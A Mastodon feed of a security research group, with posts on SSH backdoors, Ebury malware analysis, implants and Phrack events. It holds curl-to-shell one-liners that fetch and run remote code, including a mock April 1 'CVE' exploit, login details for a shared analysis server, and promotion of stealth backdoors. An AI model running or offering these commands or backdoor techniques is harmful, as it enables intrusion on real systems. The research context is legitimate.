The Hacker‘s Choice

The oldest and still active security research group - The Hacker's Choice. (Founded 1995) this is a group account, so different people post! :)

The Hacker‘s Choicethc@infosec.exchange
2025-12-14

@lp0_on_fire it will work fine without systemctl. Any way to restart the sshd will work. either by waiting for a reboot or send a SIGTERM.

The Hacker‘s Choicethc@infosec.exchange
2025-12-13

@agowa338 Can't see how rhost is better. rhosts-trick requires the attacker to drop at least 2 new files to the target and change at least 1 line in the sshd_config (HostbasedAuthentication; a line that raises a red flag).

Our trick adds no new file to the system and only needs 1 line to the config (without raising a red flag).

Please explain if I got this wrong.

The Hacker‘s Choicethc@infosec.exchange
2025-12-13

Can anyone test my *SMALLEST* SSHD backdoor?

- Survives updates.
- Does not use ~/.ssh/authorized_keys or PAM modules.
- Does not create any new file.

Just SSHD trickery.

Source at thc.org/tips

The Hacker‘s Choicethc@infosec.exchange
2025-12-02

Stealth died 😢 A member of Team-Teso, Phrack staff, and many other groups. A true hacker—perhaps as true as a hacker can ever be. WE MISS YOU. 🩷

More: thc.org/404

<stealth> we had joy we had fun we had a rootshell on a sun.

The Hacker‘s Choicethc@infosec.exchange
2025-11-21

Ebury Version 1.8.2.e6

Memory dump from live processes now available (sshd and systemd-udev). De-crypted and De-obfuscated. Enjoy.

The Hacker‘s Choicethc@infosec.exchange
2025-11-21

{eval,"$({curl,-SsfL,github.com/hackerschoice/hacks)"}

### hackshell now detects Ebury ###

The Hacker‘s Choicethc@infosec.exchange
2025-11-21

EBury SSHD backdoor?? on 400,000 hosts?

Let's fuck around and find out. (Why +s on the .so file???)

Dissect, understand & ridicule. Join the group effort at thc.org/ops or SSH straight into the server and check ~/ebury:

ssh -o "SetEnv SECRET=lYQkdQHIuQyTJngVtIskqRLx" root@adm.segfault.net (password is 'segfault')

The Hacker‘s Choicethc@infosec.exchange
2025-10-12

INTERVIEW of "MB" WhereWarlocksStayUpLate:

wherewarlocksstayuplate.com/in

You have inspired many. We are fans:⚡️🌊🎠

wherewarlocksstayuplate.com/in

The Hacker‘s Choicethc@infosec.exchange
2025-10-08

🇩🇪 German speaking only: THC member and @phrack staff on @heiseonline about Phrack's 40th, hacking and life in general.

The Hacker‘s Choicethc@infosec.exchange
2025-10-08

Inject LUA scripts into a running Linux Process like a boss, by stealth/team-teso:

c-skills.blogspot.com

The Hacker‘s Choicethc@infosec.exchange
2025-09-23

Friend of ours is testing his PoC to DISABLE XMR mining pools.

Revenge for all those pesty XMR miners installed by script kiddies. Tool destroys the ENTIRE wallet: stopping all xmr-rig miners worldwide (of the same wallet).

Looking for more WALLETs: wallet.hellknight.xyz/walletin

Please help and save a baby seal.

The Hacker‘s Choice boosted:
2025-08-09

PHONY AWARD ceremony at the PHRACK PARTY at @why2025camp hosted by @Emerson @thc and tmp.out

VOTE (by shouting) for the “Biggest Security Facepalm” and more. Legends like Hegseth and Crowdstrike have been nominated and informed.

Winning prize is the privilege to be trolled by us and pay for phrack's next print release :>

PHONY AWARD CEREMONY
hosted by tmp.out - THC - emerson 
Phrack Party @ WHY Camp 
SAT 9th of August, 20:30pm
The Hacker‘s Choice boosted:
2025-06-21

PHRACK is coming to #DEFCON! We're printing ~10,000 zines and giving an hour-long talk you won't want to miss! Stay tuned. 🔥 #40yrsOfPhrack #phrack72

The Hacker‘s Choicethc@infosec.exchange
2025-06-20

Dear UNC5174/China, you have violated THC's Terms & Conditions ("to be used for good purpose and academic research only").

May want to discuss this with your therapist. 🤷‍♂️

sentinelone.com/labs/follow-th

UNC5174 T&C violation
The Hacker‘s Choicethc@infosec.exchange
2025-06-05

Generate your own python-implant of a reverse DNS backdoor. thc.org/tips => 6.vi Smallest reverse DNS-tunnel Backdoor.

python DNS backdoor
The Hacker‘s Choice boosted:
2025-04-24

🐣 CRACKME RESULTS are OUT! 💥

Congrats to rt_saber for being so quick.

Kudos to all those who hammered CloudFlare hard.

github.com/phrackzine/crackme/

The Hacker‘s Choicethc@infosec.exchange
2025-04-15

new FEATURE in bincrypter. LOCK & ENCRYPT a binary to a target host. Will execute differently when uploaded to virustotal.com or any other but the target host.

Please don't set BC_LOCK="rm -rf ~/" 🙈

github.com/hackerschoice/bincr

The Hacker‘s Choice boosted:
2025-04-13

i heard John Young of cryptome.org/ passed away last week. #Cryptome #RIP

John was an uncompromising rolemodel, publishing all the samizdats he could get his hands on. he even demanded to be included as a defendant together with julian assange.

one of the greatest unsung heroes of the past 30 years.

shit. i hope this is not true.

RIP John.

The Hacker‘s Choicethc@infosec.exchange
2025-04-09

🍿THC member on camera. A first. 😅
30 years of hacking - a perspective and a reflection. 📺 👉 Keep Hacking 👈 The next 30 years of hacking start today. ❤️

youtube.com/watch?v=sQVLniT9CDY

The Hacker‘s Choicethc@infosec.exchange
2025-04-01

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL thc.org/7350pipe)”

Client Info

Server: https://mastodon.social
Version: 2025.07
Repository: https://github.com/cyevgeniy/lmst